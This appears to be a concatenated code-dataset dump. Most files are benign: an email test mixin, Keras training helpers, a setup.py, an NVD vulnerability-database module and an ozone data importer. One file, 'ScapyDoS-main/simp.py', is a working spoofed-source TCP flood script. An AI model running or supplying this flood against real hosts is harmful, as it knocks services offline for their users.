'text/*' : lambda self, ct: self.assertMultiLineEqual,
'*/*' : lambda self, ct: self.assertEqual,
}
#----------------------------------------------------------------------------
def registerMimeComparator(self, mimetype, comparator):
def factory(self, ct):
return comparator
self.mime_cmp_factories = dict(EmailTestMixin.mime_cmp_factories)
self.mime_cmp_factories[mimetype] = factory
#----------------------------------------------------------------------------
def _parseEmail(self, eml):
return email.message_from_string(eml)
#----------------------------------------------------------------------------
def assertEmailHeadersEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailHeadersEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailHeadersEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email headers %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailStructureEqual(self, eml1, eml2, msg=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
#----------------------------------------------------------------------------
def assertNotEmailStructureEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailStructureEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email structure %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailContentEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailContentEqual(self, eml1, eml2, msg=None):
try:
self.assertEmailContentEqual(eml1, eml2, msg=msg)
self.fail(msg or 'email content %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def assertEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
eml1 = self._parseEmail(eml1)
eml2 = self._parseEmail(eml2)
self._assertEmailHeadersEqual(eml1, eml2, msg=msg)
self._assertEmailStructureEqual(eml1, eml2, msg=msg)
self._assertEmailContentEqual(eml1, eml2, msg=msg, mcf=mime_cmp_factories)
#----------------------------------------------------------------------------
def assertNotEmailEqual(self, eml1, eml2, msg=None, mime_cmp_factories=None):
try:
self.assertEmailEqual(eml1, eml2, msg=msg, mime_cmp_factories=mime_cmp_factories)
self.fail(msg or 'email %r == %r' % (eml1, eml2))
except AssertionError: pass
#----------------------------------------------------------------------------
def _assertEmailHeadersEqual(self, msg1, msg2, msg=None):
hdr1 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg1)
hdr2 = 'EMAIL HEADERS:\n' + canonicalHeaders(msg2)
self.assertMultiLineEqual(hdr1, hdr2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailStructureEqual(self, msg1, msg2, msg=None):
str1 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg1)
str2 = 'EMAIL STRUCTURE:\n' + canonicalStructure(msg2)
self.assertMultiLineEqual(str1, str2, msg=msg)
#----------------------------------------------------------------------------
def _assertEmailContentEqual(self, msg1, msg2, msg=None, mcf=None, context=None):
if context is None:
context = 'component root'
self.assertEqual(
msg1.is_multipart(), msg2.is_multipart(),
msg=makemsg(msg, context + ' is not multipart similar'))
self.assertEqual(
msg1.get_content_type(), msg2.get_content_type(),
msg=makemsg(msg, context + ' has content-type mismatch'))
if context == 'component root':
context = 'component ' + msg1.get_content_type()
if not msg1.is_multipart():
return self._assertEmailPayloadEqual(
msg1, msg2, msg=msg, mcf=mcf, context=context)
msgs1 = msg1.get_payload()
msgs2 = msg2.get_payload()
self.assertEqual(
len(msgs1), len(msgs2),
msg=makemsg(msg, context + ' has sub-message count mismatch'))
for idx, submsg in enumerate(msgs1):
sctxt = context + '[' + str(idx) + '] > ' + submsg.get_content_type()
self._assertEmailContentEqual(
submsg, msgs2[idx], msg=msg, mcf=mcf, context=sctxt)
#----------------------------------------------------------------------------
def _assertEmailPayloadEqual(self, msg1, msg2, msg=None, mcf=None, context='message'):
# paranoia...
self.assertFalse(msg1.is_multipart() or msg2.is_multipart())
self.assertEqual(msg1.get_content_type(), msg2.get_content_type())
# /paranoia...
dat1 = msg1.get_payload(decode=True)
dat2 = msg2.get_payload(decode=True)
def getcmp(msg, mcf):
ret = mcf.get(msg.get_content_type())
if ret is None:
ret = mcf.get(msg.get_content_maintype() + '/*')
if ret is None:
ret = mcf.get('*/*')
return ret
pcmp = None
if mcf is not None:
pcmp = getcmp(msg1, mcf)
if pcmp is None:
pcmp = getcmp(msg1, self.mime_cmp_factories)
self.assertIsNotNone(
pcmp, 'no comparator for mime-type "%s"' % (msg1.get_content_type(),))
pcmp = pcmp(self, msg1.get_content_type())
try:
pcmp(dat1, dat2)
except AssertionError as err:
raise AssertionError(
makemsg(msg, context + ' has different payload') + '; ' + err.message)
#----------------------------------------------------------------------------
def try_assertXmlEqual(self, dat1, dat2, msg=None):
if hasattr(self, 'assertXmlEqual'):
return self.assertXmlEqual(dat1, dat2)
return self.assertMultiLineEqual(dat1, dat2)
#------------------------------------------------------------------------------
# end of $Id$
#------------------------------------------------------------------------------
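# A hedged usage sketch, not part of the original module: mixing EmailTestMixin
# into a unittest.TestCase (unittest is already imported above) and comparing
# two raw messages on headers and structure.
class ExampleEmailTest(EmailTestMixin, unittest.TestCase):
    def test_identical_messages_compare_equal(self):
        eml = 'Subject: hi\nContent-Type: text/plain\n\nhello'
        self.assertEmailHeadersEqual(eml, eml)
        self.assertEmailStructureEqual(eml, eml)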
| 41.584475
| 88
| 0.533326
| 899
| 9,107
| 5.302558
| 0.220245
| 0.043633
| 0.041536
| 0.029369
| 0.310678
| 0.28005
| 0.259702
| 0.200336
| 0.155444
| 0.127124
| 0
| 0.017458
| 0.16976
| 9,107
| 218
| 89
| 41.775229
| 0.613014
| 0.284616
| 0
| 0.216783
| 0
| 0
| 0.072536
| 0.003875
| 0
| 0
| 0
| 0.004587
| 0.321678
| 1
| 0.13986
| false
| 0.027972
| 0.020979
| 0.013986
| 0.251748
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe75c11d0a13c6adf86f05d6ce0d9f94ca54fb9c
| 5,410
|
py
|
Python
|
src/training_utils/training.py
|
JoseLuisRojasAranda/tfmodels
|
56dce0236f0cc03dd7031aecf305d470c9fb97a9
|
[
"MIT"
] | 1
|
2020-06-05T23:25:03.000Z
|
2020-06-05T23:25:03.000Z
|
src/training_utils/training.py
|
JoseLuisRojasAranda/tfmodels
|
56dce0236f0cc03dd7031aecf305d470c9fb97a9
|
[
"MIT"
] | null | null | null |
src/training_utils/training.py
|
JoseLuisRojasAranda/tfmodels
|
56dce0236f0cc03dd7031aecf305d470c9fb97a9
|
[
"MIT"
] | null | null | null |
import os
from os import path
import json
import shutil
import tensorflow as tf
import numpy as np
# Import Keras API components
from tensorflow.keras.optimizers import Adam, RMSprop
from tensorflow.keras.models import Sequential
from tensorflow.keras.utils import plot_model
# Import the model callbacks
from training_utils.callbacks import TrainingCheckPoints
from tensorflow.keras.callbacks import CSVLogger, TensorBoard
# Import helpers for plotting the training run
from training_utils.training_graphs import graph_confusion_matrix
from training_utils.training_graphs import graph_model_metrics
# Function that continues the training of a model
# Args:
# path_to_model: path were to find the model and setup
# dataset: tuple of tensorflow dataset of (train, test)
def continue_training(path_to_model, dataset):
if not path.exists(path_to_model):
print("[ERROR] El path a la carpeta del modelo no existe")
return
# Load the model setup
setup = None
with open(path_to_model+"setup.json", "r") as data:
setup = json.load(data)
# Load the training state
state = None
with open(path_to_model+"checkpoints/"+"training_state.json", "r") as data:
state = json.load(data)
print("[INFO] Continuando entrenameinto de modelo.")
# Load the model
model_name = "model_checkpoint_{}.h5".format(state["epoch"]-1)
model = tf.keras.models.load_model(path_to_model+"checkpoints/"+model_name)
# Recompile the model
opt = Adam(lr=state["learning_rate"])
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], initial_epoch=state["epoch"],
path=setup["path"], continue_train=True, classes=setup["classes"])
# Method that starts the model training
# Args:
# setup: Dictionary with the model setup
# model: the keras.Model architecture to train
# dataset: tuple of tensorflow dataset of (train, test)
def train_model(setup, model, dataset):
# Make sure the output path exists
if not path.exists(setup["path"]):
os.makedirs(setup["path"])
else:
# Delete the folders if they already exist
if path.exists(setup["path"]+"checkpoints"):
shutil.rmtree(setup["path"]+"checkpoints")
if path.exists(setup["path"]+"logs"):
shutil.rmtree(setup["path"]+"logs")
# Create the folder where checkpoints will be stored
if not path.exists(setup["path"]+"checkpoints"):
os.mkdir(setup["path"] + "checkpoints")
# Write the training setup to disk
with open(setup["path"]+"setup.json", "w") as writer:
json.dump(setup, writer, indent=4)
print("[INFO] Entrenando modelo.")
# Plot the model architecture
plot_model(model, to_file=setup["path"]+"model_architecture.png",
show_shapes=True, show_layer_names=True, expand_nested=False)
# Create the optimizer, Adam by default
opt = Adam(lr=setup["learning_rate"])
#opt = RMSprop(lr=setup["learning_rate"])
# Compile the model
model.compile(loss=setup["loss"], optimizer=opt, metrics=setup["metrics"])
fit_model(compiled_model=model, dataset=dataset, opt=opt,
epochs=setup["epochs"], path=setup["path"], classes=setup["classes"])
# Method that trains an already compiled model; it sets up TensorBoard
# callbacks, logging to a CSV file and checkpoint creation whenever the loss
# improves, and also plots metrics and builds the confusion matrix
# Args:
# compiled_model: keras.Model, already compiled
# dataset: tuple of tensorflow dataset of (train, test)
# opt: keras.Optimizer used in training
# epochs: The number of epochs to train
# initial_epoch: Epoch to start training, 0 for normal training
# continue_train: if the model is continuing training
# classes: array of classes that the model predicts
def fit_model(compiled_model=None, # the model must already be compiled
dataset=None,
opt=None,
epochs=None,
initial_epoch=0,
path=None,
continue_train=False,
classes=None):
# Get the dataset
train, test = dataset
# Callbacks used during training
relative = 0
if initial_epoch >= 1:
relative = initial_epoch
callbacks = [
#TrainingCheckPoints(path+"checkpoints/", relative_epoch=relative),
CSVLogger(path+"training_log.csv", append=continue_train),
TensorBoard(log_dir=path+"logs")
]
# Train the model
history = compiled_model.fit(train, initial_epoch=initial_epoch, epochs=epochs,
callbacks=callbacks, validation_data=test)
# Save the model
print("[INFO] Serializing model.")
compiled_model.save(path + "model.h5")
# Plot the training metrics
graph_model_metrics(csv_path=path+"training_log.csv",
img_path=path+"metrics_graph.png")
# Build the confusion matrix
if test is not None:
print("[INFO] Building confusion matrix")
graph_confusion_matrix(model=compiled_model, test_dataset=test,
classes=classes, path=path+"confusion_matrix.png")
def load_model(path):
model = tf.keras.models.load_model(path + "model.h5")
with open(path + "setup.json", "r") as data:
setup = json.load(data)
return model, setup["classes"]
| 35.359477
| 84
| 0.697227
| 717
| 5,410
| 5.153417
| 0.267782
| 0.029229
| 0.017862
| 0.020568
| 0.200271
| 0.18295
| 0.15751
| 0.117997
| 0.106631
| 0.064411
| 0
| 0.002079
| 0.199815
| 5,410
| 152
| 85
| 35.592105
| 0.851467
| 0.302773
| 0
| 0.074074
| 0
| 0
| 0.154775
| 0.011803
| 0
| 0
| 0
| 0.006579
| 0
| 1
| 0.049383
| false
| 0
| 0.160494
| 0
| 0.234568
| 0.061728
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe774ebe12faa6fdf372c8d9db66e886229109cb
| 3,563
|
py
|
Python
|
setup.py
|
truggles/pudl
|
6f41664f8243b8f7aafdbbfc8522f96043dbf561
|
[
"MIT"
] | null | null | null |
setup.py
|
truggles/pudl
|
6f41664f8243b8f7aafdbbfc8522f96043dbf561
|
[
"MIT"
] | null | null | null |
setup.py
|
truggles/pudl
|
6f41664f8243b8f7aafdbbfc8522f96043dbf561
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Setup script to make PUDL directly installable with pip."""
import os
from pathlib import Path
from setuptools import find_packages, setup
install_requires = [
'coloredlogs',
'datapackage>=1.9.0',
'dbfread',
'goodtables',
'matplotlib',
'networkx>=2.2',
'numpy',
'pandas>=0.24',
'pyarrow>=0.14.0',
'pyyaml',
'scikit-learn>=0.20',
'scipy',
'sqlalchemy>=1.3.0',
'tableschema',
'tableschema-sql>=1.1.0',
'timezonefinder',
'xlsxwriter',
]
# We are installing the PUDL module to build the docs, but the C libraries
# required to build snappy aren't available on RTD, so we need to exclude it
# from the installed dependencies here, and mock it for import in docs/conf.py
# using the autodoc_mock_imports parameter:
if not os.getenv('READTHEDOCS'):
install_requires.append('python-snappy')
doc_requires = [
'doc8',
'sphinx',
'sphinx_rtd_theme',
]
test_requires = [
'bandit',
'coverage',
'doc8',
'flake8',
'flake8-docstrings',
'flake8-builtins',
'pep8-naming',
'pre-commit',
'pydocstyle',
'pytest',
'pytest-cov',
'nbval',
]
readme_path = Path(__file__).parent / "README.rst"
long_description = readme_path.read_text()
setup(
name='catalystcoop.pudl',
description='An open data processing pipeline for public US utility data.',
long_description=long_description,
long_description_content_type='text/x-rst',
use_scm_version=True,
author='Catalyst Cooperative',
author_email='pudl@catalyst.coop',
maintainer='Zane A. Selvans',
maintainer_email='zane.selvans@catalyst.coop',
url="https://catalyst.coop/pudl",
project_urls={
"Source": "https://github.com/catalyst-cooperative/pudl",
"Documentation": "https://catalystcoop-pudl.readthedocs.io",
"Issue Tracker": "https://github.com/catalyst-cooperative/pudl/issues",
},
license='MIT',
keywords=[
'electricity', 'energy', 'data', 'analysis', 'mcoe', 'climate change',
'finance', 'eia 923', 'eia 860', 'ferc', 'form 1', 'epa ampd',
'epa cems', 'coal', 'natural gas', ],
python_requires='>=3.7, <3.8.0a0',
setup_requires=['setuptools_scm'],
install_requires=install_requires,
extras_require={
"doc": doc_requires,
"test": test_requires,
},
classifiers=[
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Science/Research',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python :: 3.7',
'Topic :: Scientific/Engineering',
],
packages=find_packages('src'),
package_dir={'': 'src'},
# package_data is data that is deployed within the python package on the
# user's system. setuptools will get whatever is listed in MANIFEST.in
include_package_data=True,
# This defines the interfaces to the command line scripts we're including:
entry_points={
'console_scripts': [
'pudl_data = pudl.workspace.datastore_cli:main',
'pudl_setup = pudl.workspace.setup_cli:main',
'pudl_etl = pudl.cli:main',
'datapkg_to_sqlite = pudl.convert.datapkg_to_sqlite:main',
'ferc1_to_sqlite = pudl.convert.ferc1_to_sqlite:main',
'epacems_to_parquet = pudl.convert.epacems_to_parquet:main',
]
},
)
| 30.452991
| 79
| 0.641033
| 419
| 3,563
| 5.310263
| 0.563246
| 0.026966
| 0.017079
| 0.026966
| 0.033258
| 0.033258
| 0
| 0
| 0
| 0
| 0
| 0.016181
| 0.219478
| 3,563
| 116
| 80
| 30.715517
| 0.783891
| 0.156329
| 0
| 0.020408
| 0
| 0
| 0.488473
| 0.078851
| 0
| 0
| 0
| 0.008621
| 0
| 1
| 0
| false
| 0
| 0.030612
| 0
| 0.030612
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe77c98170bf9d8232497412401b6f749ddb70f7
| 7,836
|
py
|
Python
|
src/vulnix/nvd.py
|
dermetfan/vulnix
|
06daccda0e51098fbdbc65f61b6663c5c6df9358
|
[
"BSD-3-Clause"
] | 217
|
2016-07-03T10:45:56.000Z
|
2022-03-30T12:06:51.000Z
|
src/vulnix/nvd.py
|
dermetfan/vulnix
|
06daccda0e51098fbdbc65f61b6663c5c6df9358
|
[
"BSD-3-Clause"
] | 70
|
2016-06-27T08:47:22.000Z
|
2022-01-22T19:10:53.000Z
|
src/vulnix/nvd.py
|
dermetfan/vulnix
|
06daccda0e51098fbdbc65f61b6663c5c6df9358
|
[
"BSD-3-Clause"
] | 24
|
2016-06-27T09:23:50.000Z
|
2022-01-30T05:32:22.000Z
|
from BTrees import OOBTree
from datetime import datetime, date, timedelta
from persistent import Persistent
from .vulnerability import Vulnerability
import fcntl
import glob
import gzip
import json
import logging
import os
import os.path as p
import requests
import transaction
import ZODB
import ZODB.FileStorage
DEFAULT_MIRROR = 'https://nvd.nist.gov/feeds/json/cve/1.1/'
DEFAULT_CACHE_DIR = '~/.cache/vulnix'
_log = logging.getLogger(__name__)
class NVD(object):
"""Access to the National Vulnerability Database.
https://nvd.nist.gov/
"""
def __init__(self, mirror=DEFAULT_MIRROR, cache_dir=DEFAULT_CACHE_DIR):
self.mirror = mirror.rstrip('/') + '/'
self.cache_dir = p.expanduser(cache_dir)
current = date.today().year
self.available_archives = [y for y in range(current-5, current+1)]
def lock(self):
self._lock = open(p.join(self.cache_dir, 'lock'), 'a')
try:
fcntl.lockf(self._lock, fcntl.LOCK_EX | fcntl.LOCK_NB)
except OSError:
_log.info('Waiting for NVD lock...')
fcntl.lockf(self._lock, fcntl.LOCK_EX)
def __enter__(self):
"""Keeps database connection open while in this context."""
_log.debug('Opening database in %s', self.cache_dir)
os.makedirs(self.cache_dir, exist_ok=True)
self.lock()
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
try:
self._root.setdefault('advisory', OOBTree.OOBTree())
self._root.setdefault('by_product', OOBTree.OOBTree())
self._root.setdefault('meta', Meta())
# may trigger exceptions if the database is inconsistent
list(self._root['by_product'].keys())
if 'archives' in self._root:
_log.warn('Pre-1.9.0 database found - rebuilding')
self.reinit()
except (TypeError, EOFError):
_log.warn('Incompatible objects found in database - rebuilding DB')
self.reinit()
return self
def __exit__(self, exc_type=None, exc_value=None, exc_tb=None):
if exc_type is None:
if self.meta.should_pack():
_log.debug('Packing database')
self._db.pack()
transaction.commit()
else:
transaction.abort()
self._connection.close()
self._db.close()
self._lock = None
def reinit(self):
"""Remove old DB and rebuild it from scratch."""
self._root = None
transaction.abort()
self._connection.close()
self._db = None
for f in glob.glob(p.join(self.cache_dir, "Data.fs*")):
os.unlink(f)
self._db = ZODB.DB(ZODB.FileStorage.FileStorage(
p.join(self.cache_dir, 'Data.fs')))
self._connection = self._db.open()
self._root = self._connection.root()
self._root['advisory'] = OOBTree.OOBTree()
self._root['by_product'] = OOBTree.OOBTree()
self._root['meta'] = Meta()
@property
def meta(self):
return self._root['meta']
def relevant_archives(self):
"""Returns list of NVD archives to check.
If there was an update within the last two hours, nothing is
done. If the last update was recent enough to be covered by
the 'modified' feed, only that is checked. Else, all feeds
are checked.
"""
last_update = self.meta.last_update
if last_update > datetime.now() - timedelta(hours=2):
return []
# the "modified" feed is sufficient if used frequently enough
if last_update > datetime.now() - timedelta(days=7):
return ['modified']
return self.available_archives
def update(self):
"""Download archives (if changed) and add CVEs to database."""
changed = []
for a in self.relevant_archives():
arch = Archive(a)
changed.append(arch.download(self.mirror, self.meta))
self.add(arch)
if any(changed):
self.meta.last_update = datetime.now()
self.reindex()
def add(self, archive):
advisories = self._root['advisory']
for (cve_id, adv) in archive.items():
advisories[cve_id] = adv
def reindex(self):
"""Regenerate product index."""
_log.info('Reindexing database')
del self._root['by_product']
bp = OOBTree.OOBTree()
for vuln in self._root['advisory'].values():
if vuln.nodes:
for prod in (n.product for n in vuln.nodes):
bp.setdefault(prod, [])
bp[prod].append(vuln)
self._root['by_product'] = bp
transaction.commit()
def by_id(self, cve_id):
"""Returns vuln or raises KeyError."""
return self._root['advisory'][cve_id]
def by_product(self, product):
"""Returns list of matching vulns or empty list."""
try:
return self._root['by_product'][product]
except KeyError:
return []
def affected(self, pname, version):
"""Returns list of matching vulnerabilities."""
res = set()
for vuln in self.by_product(pname):
if vuln.match(pname, version):
res.add(vuln)
return res
class Archive:
"""Single JSON data structure from NIST NVD."""
def __init__(self, name):
"""Creates JSON feed object.
`name` consists of a year or "modified".
"""
self.name = name
self.download_uri = 'nvdcve-1.1-{}.json.gz'.format(name)
self.advisories = {}
def download(self, mirror, meta):
"""Fetches compressed JSON data from NIST.
Nothing is done if we have already seen the same version of
the feed before.
Returns True if anything has been loaded successfully.
"""
url = mirror + self.download_uri
_log.info('Loading %s', url)
r = requests.get(url, headers=meta.headers_for(url))
r.raise_for_status()
if r.status_code == 200:
_log.debug('Loading JSON feed "%s"', self.name)
self.parse(gzip.decompress(r.content))
meta.update_headers_for(url, r.headers)
return True
else:
_log.debug('Skipping JSON feed "%s" (%s)', self.name, r.reason)
return False
def parse(self, nvd_json):
added = 0
raw = json.loads(nvd_json)
for item in raw['CVE_Items']:
try:
vuln = Vulnerability.parse(item)
self.advisories[vuln.cve_id] = vuln
added += 1
except ValueError:
_log.debug('Failed to parse NVD item: %s', item)
_log.debug("Added %s vulnerabilities", added)
def items(self):
return self.advisories.items()
class Meta(Persistent):
"""Metadate for database maintenance control"""
pack_counter = 0
last_update = datetime(1970, 1, 1)
etag = None
def should_pack(self):
self.pack_counter += 1
if self.pack_counter > 25:
self.pack_counter = 0
return True
return False
def headers_for(self, url):
"""Returns dict of additional request headers."""
if self.etag and url in self.etag:
return {'If-None-Match': self.etag[url]}
return {}
def update_headers_for(self, url, resp_headers):
"""Updates self from HTTP response headers."""
if 'ETag' in resp_headers:
if self.etag is None:
self.etag = OOBTree.OOBTree()
self.etag[url] = resp_headers['ETag']
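A hedged usage sketch for the NVD class above; it assumes the package is importable as vulnix.nvd, plus a writable cache directory and network access to the NIST feeds (the package name and version are illustrative):
from vulnix.nvd import NVD

with NVD(cache_dir='~/.cache/vulnix-demo') as nvd:   # hypothetical cache location
    nvd.update()                                     # fetches only feeds that changed
    for vuln in nvd.affected('openssl', '1.0.1'):    # illustrative package/version
        print(vuln.cve_id)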
| 32.786611
| 79
| 0.590225
| 963
| 7,836
| 4.660436
| 0.268951
| 0.032086
| 0.018717
| 0.018939
| 0.143939
| 0.113859
| 0.085784
| 0.049465
| 0.049465
| 0.049465
| 0
| 0.004897
| 0.296325
| 7,836
| 238
| 80
| 32.92437
| 0.809032
| 0.144206
| 0
| 0.16185
| 0
| 0
| 0.083627
| 0.003216
| 0
| 0
| 0
| 0
| 0
| 1
| 0.115607
| false
| 0
| 0.086705
| 0.011561
| 0.32948
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7996f8bc015e9c1e0a7458bde9909f14df8fbf
| 316
|
py
|
Python
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-17T03:35:03.000Z
|
2021-12-08T06:00:31.000Z
|
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | null | null | null |
ScapyDoS-main/simp.py
|
Zusyaku/Termux-And-Lali-Linux-V2
|
b1a1b0841d22d4bf2cc7932b72716d55f070871e
|
[
"Apache-2.0"
] | 2
|
2021-11-05T18:07:48.000Z
|
2022-02-24T21:25:07.000Z
|
from scapy.all import *
src = input("Source IP: ")
target = input("Target IP: ")
i=1
while True:
for srcport in range(1, 65535):
ip = IP(src=src, dst=target)
tcp = TCP(sport=srcport, dport=80)
pkt = ip / tcp
send(pkt, inter= .0001)
print("Packet Sent ", i)
i=i+1
| 22.571429
| 42
| 0.550633
| 48
| 316
| 3.625
| 0.625
| 0.022989
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.063636
| 0.303797
| 316
| 14
| 43
| 22.571429
| 0.727273
| 0
| 0
| 0
| 0
| 0
| 0.107256
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.083333
| 0
| 0.083333
| 0.083333
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7a4e994d80d1a5a6af69534d2790e8dc14f03c
| 4,354
|
py
|
Python
|
data_importer_ftp.py
|
supsi-dacd-isaac/oasi-ozone-forecaster
|
01d23c374e857dcc6d556d073c0380186c2934d2
|
[
"MIT"
] | null | null | null |
data_importer_ftp.py
|
supsi-dacd-isaac/oasi-ozone-forecaster
|
01d23c374e857dcc6d556d073c0380186c2934d2
|
[
"MIT"
] | null | null | null |
data_importer_ftp.py
|
supsi-dacd-isaac/oasi-ozone-forecaster
|
01d23c374e857dcc6d556d073c0380186c2934d2
|
[
"MIT"
] | null | null | null |
# --------------------------------------------------------------------------- #
# Importing section
# --------------------------------------------------------------------------- #
import os
import sys
import argparse
import logging
import json
from classes.alerts import SlackClient
from influxdb import InfluxDBClient
from classes.data_manager import DataManager
# --------------------------------------------------------------------------- #
# Functions
# --------------------------------------------------------------------------- #
def slack_msg():
slack_client = SlackClient(logger, cfg)
if bool(dm.files_not_correctly_handled):
str_err = ''
for k in dm.files_not_correctly_handled:
str_err = '%sFailed handling of file %s; Exception: %s\n' % (str_err, k, dm.files_not_correctly_handled[k])
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES ALARM:\n%s' % str_err, '#ff0000')
else:
slack_client.send_alert_message('OZONE FORECASTER - RAW FILES PROPERLY HANDLED', '#00ff00')
# --------------------------------------------------------------------------- #
# Main
# --------------------------------------------------------------------------- #
if __name__ == "__main__":
# --------------------------------------------------------------------------- #
# Configuration file
# --------------------------------------------------------------------------- #
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument("-c", help="configuration file")
arg_parser.add_argument("-l", help="log file (optional, if empty log redirected on stdout)")
args = arg_parser.parse_args()
config_file = args.c
if os.path.isfile(config_file) is False:
print('\nATTENTION! Unable to open configuration file %s\n' % config_file)
sys.exit(1)
cfg = json.loads(open(args.c).read())
conns_cfg = json.loads(open(cfg['connectionsFile']).read())
cfg.update(conns_cfg)
# --------------------------------------------------------------------------- #
# Set logging object
# --------------------------------------------------------------------------- #
if not args.l:
log_file = None
else:
log_file = args.l
logger = logging.getLogger()
logging.basicConfig(format='%(asctime)-15s::%(levelname)s::%(funcName)s::%(message)s', level=logging.INFO,
filename=log_file)
# --------------------------------------------------------------------------- #
# Starting program
# --------------------------------------------------------------------------- #
logger.info("Starting program")
# --------------------------------------------------------------------------- #
# InfluxDB connection
# --------------------------------------------------------------------------- #
logger.info('Connection to InfluxDb server on socket [%s:%s]' % (cfg['influxDB']['host'], cfg['influxDB']['port']))
try:
influx_client = InfluxDBClient(host=cfg['influxDB']['host'], port=cfg['influxDB']['port'],
password=cfg['influxDB']['password'], username=cfg['influxDB']['user'],
database=cfg['influxDB']['database'], ssl=cfg['influxDB']['ssl'])
except Exception as e:
logger.error('EXCEPTION: %s' % str(e))
sys.exit(3)
logger.info('Connection successful')
dm = DataManager(influx_client, cfg, logger)
# Download files from the FTP server
if cfg['ftp']['enabled'] is True:
logger.info('Download data from FTP server')
dm.open_ftp_connection()
dm.download_remote_files()
# Insert data into InfluxDB
if cfg['influxDB']['dataImporting'] is True:
logger.info('Importing in InfluxDB of raw data related to files in %s' % cfg['ftp']['localFolders']['tmp'])
dm.insert_data()
# Delete files correctly handled on the FTP server and close the FTP connection
if cfg['ftp']['enabled'] is True:
if cfg['ftp']['deleteRemoteFile'] is True:
logger.info('Delete handled files from FTP server')
dm.delete_remote_files()
dm.close_ftp_connection()
# Slack alert
if cfg['alerts']['slack']['enabled'] is True:
slack_msg()
logger.info("Ending program")
| 41.075472
| 119
| 0.475195
| 406
| 4,354
| 4.955665
| 0.344828
| 0.049205
| 0.014911
| 0.02833
| 0.115308
| 0.102386
| 0.081511
| 0.049702
| 0.049702
| 0
| 0
| 0.003368
| 0.181672
| 4,354
| 105
| 120
| 41.466667
| 0.561325
| 0.307304
| 0
| 0.064516
| 0
| 0
| 0.262097
| 0.018817
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016129
| false
| 0.016129
| 0.16129
| 0
| 0.177419
| 0.016129
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
fe7b77f497a02a03531071b294b121357332567e
| 2,791
|
py
|
Python
|
autoindent_code_JASS_war3map_j.py
|
gil9red/SimplePyScripts
|
c191ce08fbdeb29377639184579e392057945154
|
[
"CC-BY-4.0"
] | 117
|
2015-12-18T07:18:27.000Z
|
